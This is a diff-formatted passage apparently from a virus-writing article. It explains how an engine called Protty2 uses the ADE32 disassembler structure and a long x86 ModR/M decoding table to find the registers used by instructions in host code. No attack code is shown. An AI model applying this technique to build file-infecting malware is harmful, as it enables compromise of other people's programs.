+Each instruction consists of an Opcode, a Register and/or Address mode 
+specifier (if required) consisting of the ModR/M byte and sometimes the 
+scale -index-base (SIB) byte, a displacement (if required), and an 
+immediate data field (if required).
+
+Z0mbies ADE32 engine can disassembly every instruction and return the 
+DISASM structure which provides information useful for us. 
+Here is the structure:
+
+
+struct disasm_struct
+{
+ IN OUT BYTE  disasm_defaddr;       -- specify 4 for 32-bit code
+ IN OUT BYTE  disasm_defdata;       -- specify 4 for 32-bit code
+ OUT DWORD    disasm_len;           -- total length of opcode or 0
+ OUT DWORD    disasm_flag;          -- bitset of C_xxx
+ OUT DWORD    disasm_addrsize;      -- size of address (or 0 if no addr)
+ OUT DWORD    disasm_datasize;      -- size of data    (or 0 if no data)
+ OUT BYTE     disasm_rep;           -- REP prefix value (if C_REP)
+ OUT BYTE     disasm_seg;           -- SEG prefix value (if C_SEG)
+ OUT BYTE     disasm_opcode;        -- opcode value (present if no error)
+ OUT BYTE     disasm_opcode2;       -- 2nd opcode value (if C_OPCODE2)
+ OUT BYTE     disasm_modrm;         -- MODRM value (if C_MODRM)
+ OUT BYTE     disasm_sib;           -- SIB value (if C_SIB)
+ OUT BYTE     disasm_addr[8];       -- address (if disasm_addrsize!=0)
+ OUT BYTE     disasm_data[8];       -- data (if disasm_datasize!=0)
+};
+
+
+To get the registers used by the instruction, we need to check the
+disasm_modrm value. Of course there are few exceptions like one-bytes 
+intructions (no ModR/M) like "lodsb/lodsw/stosb" etc.etc. Protty2 is doing
+manual check for them. Sometimes encoding of the ModR/M requires a SIB 
+byte to fully specify the addressing form. The base+index and scale+index
+forms of a 32bit addressing require the SIB byte. This, due to lack of 
+free time, wasn't implemented in P2, however when the mechanism cannot find
+the "registers used" it does some brute-scan and check all registers in
+host context (this should cover most of the unknown-cases).
+
+
+But lets go back to ModR/M-s:
+
+Lets imagine we are disassembling following instruction:
+- MOV EAX,DWORD PTR DS:[EBX]
+
+The value returned in disasm_modrm is equal to 03h. By knowing this the
+library checks following table (look for 03):
+
+
+    (32-Bit Addressing Forms with the ModR/M Byte Translated Table)
+
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+        A  ModR/M Byte                  A Src/Dst, Src/Dst Operand    
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		00	       	A [EAX], EAX/AX/AL 		  	
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		01	       	A [ECX], EAX/AX/AL  			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		02	       	A [EDX], EAX/AX/AL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		03	       	A [EBX], EAX/AX/AL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		04	       	A [--][--], EAX/AX/AL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		05	       	A [disp32], EAX/AX/AL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		06	       	A [ESI], EAX/AX/AL  			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		07	       	A [EDI], EAX/AX/AL    			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		08	       	A [EAX], ECX/CX/CL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		09	       	A [ECX], ECX/CX/CL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		0A	       	A [EDX], ECX/CX/CL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		0B	       	A [EBX], ECX/CX/CL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		0C	       	A [--][--], ECX/CX/CL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		0D	       	A [disp32], ECX/CX/CL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		0E	       	A [ESI], ECX/CX/CL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		0F	       	A [EDI], ECX/CX/CL			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		10	       	A [EAX], EDX/DX/DL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		11	       	A [ECX], EDX/DX/DL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		12	       	A [EDX], EDX/DX/DL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		13	       	A [EBX], EDX/DX/DL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		14	       	A [--][--], EDX/DX/DL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		15	       	A [disp32], EDX/DX/DL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		16	       	A [ESI], EDX/DX/DL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		17	       	A [EDI], EDX/DX/DL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		18	       	A [EAX], EBX/BX/BL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		19	       	A [ECX], EBX/BX/BL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		1A	       	A [EDX], EBX/BX/BL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		1B	       	A [EBX], EBX/BX/BL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		1C	       	A [--][--], EBX/BX/BL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		1D	       	A [disp32], EBX/BX/BL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		1E	       	A [ESI], EBX/BX/BL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		1F	       	A [EDI], EBX/BX/BL 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		20	       	A [EAX], ESP/SP/AH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		21	       	A [ECX], ESP/SP/AH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		22	       	A [EDX], ESP/SP/AH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		23	       	A [EBX], ESP/SP/AH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		24	       	A [--][--], ESP/SP/AH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		25	       	A [disp32], ESP/SP/AH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		26	       	A [ESI], ESP/SP/AH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		27	       	A [EDI], ESP/SP/AH      		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		28	       	A [EAX], EBP/BP/CH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		29	       	A [ECX], EBP/BP/CH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		2A	       	A [EDX], EBP/BP/CH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		2B	       	A [EBX], EBP/BP/CH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		2C	       	A [--][--], EBP/BP/CH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		2D	       	A [disp32], EBP/BP/CH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		2E	       	A [ESI], EBP/BP/CH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		2F	       	A [EDI], EBP/BP/CH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		30	       	A [EAX], ESI/SI/DH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		31	       	A [ECX], ESI/SI/DH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		32	       	A [EDX], ESI/SI/DH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		33	       	A [EBX], ESI/SI/DH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		34       	A [--][--], ESI/SI/DH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		35	       	A [disp32], ESI/SI/DH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		36	       	A [ESI], ESI/SI/DH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		37	       	A [EDI], ESI/SI/DH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		38	       	A [EAX], EDI/DI/BH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		39	       	A [ECX], EDI/DI/BH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		3A	       	A [EDX], EDI/DI/BH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		3B	       	A [EBX], EDI/DI/BH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		3C	       	A [--][--], EDI/DI/BH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		3D	       	A [disp32], EDI/DI/BH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		3E	       	A [ESI], EDI/DI/BH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		3F	       	A [EDI], EDI/DI/BH 			
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		40	       	A [disp8+EAX], EAX/AX/AL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		41	       	A [disp8+ECX], EAX/AX/AL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		42	       	A [disp8+EDX], EAX/AX/AL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		43	       	A [disp8+EBX], EAX/AX/AL 	
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		44	       	A [disp8+[--][--]], EAX/AX/AL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		45	       	A [disp8+EBP], EAX/AX/AL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		46	       	A [disp8+ESI], EAX/AX/AL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		47	       	A [disp8+EDI], EAX/AX/AL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		48	       	A [disp8+EAX], ECX/CX/CL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		49	       	A [disp8+ECX], ECX/CX/CL 	
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		4A	       	A [disp8+EDX], ECX/CX/CL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		4B	       	A [disp8+EBX], ECX/CX/CL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		4C	       	A [disp8+[--][--]], ECX/CX/CL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		4D	       	A [disp8+EBP], ECX/CX/CL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		4E	       	A [disp8+ESI], ECX/CX/CL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		4F	       	A [disp8+EDI], ECX/CX/CL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		50	       	A [disp8+EAX], EDX/DX/DL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		51	       	A [disp8+ECX], EDX/DX/DL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		52	       	A [disp8+EDX], EDX/DX/DL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		53	       	A [disp8+EBX], EDX/DX/DL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		54	       	A [disp8+[--][--]], EDX/DX/DL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		55	       	A [disp8+EBP], EDX/DX/DL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		56	       	A [disp8+ESI], EDX/DX/DL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		57	       	A [disp8+EDI], EDX/DX/DL 	
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		58	       	A [disp8+EAX], EBX/BX/BL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		59	       	A [disp8+ECX], EBX/BX/BL 	
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		5A	       	A [disp8+EDX], EBX/BX/BL 	
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		5B	       	A [disp8+EBX], EBX/BX/BL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		5C	       	A [disp8+[--][--]], EBX/BX/BL 	
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		5D	       	A [disp8+EBP], EBX/BX/BL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		5E	       	A [disp8+ESI], EBX/BX/BL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		5F	       	A [disp8+EDI], EBX/BX/BL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		60	       	A [disp8+EAX], ESP/SP/AH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		61	       	A [disp8+ECX], ESP/SP/AH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		62	       	A [disp8+EDX], ESP/SP/AH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		63	       	A [disp8+EBX], ESP/SP/AH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		64	       	A [disp8+[--][--]], ESP/SP/AH 	
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		65	       	A [disp8+EBP], ESP/SP/AH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		66	       	A [disp8+ESI], ESP/SP/AH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		67	       	A [disp8+EDI], ESP/SP/AH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		68	       	A [disp8+EAX], EBP/BP/CH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		69	       	A [disp8+ECX], EBP/BP/CH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		6A	       	A [disp8+EDX], EBP/BP/CH 	
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		6B	       	A [disp8+EBX], EBP/BP/CH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		6C	       	A [disp8+[--][--]], EBP/BP/CH 	
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		6D	       	A [disp8+EBP], EBP/BP/CH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		6E	       	A [disp8+ESI], EBP/BP/CH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		6F	       	A [disp8+EDI], EBP/BP/CH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		70	       	A [disp8+EAX], ESI/SI/DH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		71	       	A [disp8+ECX], ESI/SI/DH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		72	       	A [disp8+EDX], ESI/SI/DH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		73	       	A [disp8+EBX], ESI/SI/DH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		74	       	A [disp8+[--][--]], ESI/SI/DH 	
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		75	       	A [disp8+EBP], ESI/SI/DH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		76	       	A [disp8+ESI], ESI/SI/DH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		77	       	A [disp8+EDI], ESI/SI/DH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		78	       	A [disp8+EAX], EDI/DI/BH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		79	       	A [disp8+ECX], EDI/DI/BH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		7A	       	A [disp8+EDX], EDI/DI/BH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		7B	       	A [disp8+EBX], EDI/DI/BH 	
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		7C	       	A [disp8+[--][--]], EDI/DI/BH 	
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		7D	       	A [disp8+EBP], EDI/DI/BH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		7E	       	A [disp8+ESI], EDI/DI/BH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		7F	       	A [disp8+EDI], EDI/DI/BH 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		80	       	A [disp32+EAX], EAX/AX/AL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		81	       	A [disp32+ECX], EAX/AX/AL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		82	       	A [disp32+EDX], EAX/AX/AL 	
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		83	       	A [disp32+EBX], EAX/AX/AL 	
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		84	       	A [disp32+[--][--]], EAX/AX/AL 	
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		85	       	A [disp32+EBP], EAX/AX/AL 	
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		86	       	A [disp32+ESI], EAX/AX/AL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		87	       	A [disp32+EDI], EAX/AX/AL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		88	       	A [disp32+EAX], ECX/CX/CL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		89	       	A [disp32+ECX], ECX/CX/CL 		
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		8A	       	A [disp32+EDX], ECX/CX/CL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		8B	       	A [disp32+EBX], ECX/CX/CL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		8C	       	A [disp32+[--][--]], ECX/CX/CL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		8D	       	A [disp32+EBP], ECX/CX/CL 		
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		8E	       	A [disp32+ESI], ECX/CX/CL 	
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	A		8F	       	A [disp32+EDI], ECX/CX/CL 		
